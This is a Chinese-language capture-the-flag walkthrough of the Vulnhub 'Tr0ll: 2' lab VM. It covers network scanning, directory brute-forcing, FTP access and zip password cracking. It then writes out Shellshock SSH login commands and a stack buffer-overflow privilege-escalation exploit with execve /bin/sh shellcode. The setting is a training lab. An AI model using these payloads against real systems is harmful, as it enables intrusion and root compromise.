Vulnhub-靶机-Tr0ll: 2

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/tr0ll-2,107/

发现目标靶机IP地址是192.168.5.141，开始使用nmap对其进行扫描

通过-p-参数直接全端口扫描，发现扫描不出来，具体如下

先从80端口开始，尝试访问其web端口

查看网页源码

得知目标存在用户名为Tr0ll的可能想非常大，先放着，尝试下目录爆破

发现有robots.txt文件，直接访问看看

把这个文件robots.txt下载下来 wget http://192.168.5.141/robots.txt 然后剔除反斜杠，使用dirb进行批量尝试，挖掘可用的目录

以此访问上述4个文件，并查看其网页源码，发现这4个文件中都隐藏了相同文件名cat_the_troll.jpg的文件，依次对这些文件使用strings命令查看是否存在敏感信息，最终在如下URL发现的图片文件存在敏感信息

 

 

 将此文件夹下载下来 wget http://192.168.5.141/dont_bother/cat_the_troll.jpg

 

根据上面提示获得存在隐藏目录y0ur_self 尝试访问看看

 

 

发现是一个文件，然后里面是base64编码的内容，下载下来然后使用base64解码

wget http://192.168.5.141/y0ur_self/answer.txt

使用 base64 -d answer.txt > bmfx.txt  进行解码，解码之后看了看里面的内容，猜测可能是字典，想了想web应用也没有登录界面需要进行暴力破解猜测的，那很有可能是开放的21端口，我们访问下21端口试试

发现登录ftp的时候提示用户名Tr0ll ，这也跟我前面猜测用户名是一致的，然后使用用户名和密码一样的方式去登录看看，发现是可以登录成功的，并且看到一个文件lmao.zip 将这个文件下载下来，然后使用unzip命令进行解压，发现需要密码

使用fcrackzip进行暴力破解密码，成功破解，密码是ItCantReallyBeThisEasyRightLOL

使用密码解压出来一个文件noob，然后查看文件类型，确认是一个密钥文件，尝试使用noob用户名去登录

发现不能登录，网上找了下原因，发现是可以通过shellshock进行利用的，相关参考链接：https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh

经过测试，最终通过下面3种形式登录成功

ssh noob@192.168.5.141 -i noob -t "() { :; }; /bin/bash"
ssh -i noob noob@192.168.5.141 -t "() { :; }; /bin/bash"
ssh -i noob 192.168.5.141 -l noob -t "() { :; }; /bin/bash"

使用find命令查看特权用户信息

find / -perm -4000 2>/dev/null

这里是二进制题目，我不擅长哈，直接从网上找到对应的exp直接提权，如果大家有兴趣，可以看看网上的文章

对应的exp

./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')